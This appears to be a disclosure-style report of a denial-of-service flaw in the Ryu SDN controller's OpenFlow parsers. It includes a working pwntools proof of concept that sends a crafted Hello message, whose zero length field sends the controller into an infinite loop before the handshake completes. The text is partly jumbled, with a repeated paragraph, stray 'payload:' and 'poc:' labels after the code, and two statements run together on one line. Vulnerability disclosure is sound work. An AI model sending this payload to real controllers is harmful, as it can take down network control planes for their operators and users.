from pwn import *
p=remote("0.0.0.0",6633)
payload="04000010000000130001000000000010"
payload=bytes.fromhex(payload)p.send(payload)
p.interactive()
The Hello message is the first step in the handshake process, which means that all malicious traffic can put the controller into an infinite loop before establishing a connection with the controller.
This problem also occurs with the following code:
/ryu/ofproto/ofproto_v1_3_parser.py about line=139
/ryu/ofproto/ofproto_v1_4_parser.py about line=103
/ryu/ofproto/ofproto_v1_5_parser.py about line=104
in /ryu/ofproto/ofproto_v1_3_parser.py about line=139
If the variable length is equal to 0,the offset will no longer change and the parsing will fall into an infinite loop.
payload:
poc:
The Hello message is the first step in the handshake process, which means that all malicious traffic can put the controller into an infinite loop before establishing a connection with the controller.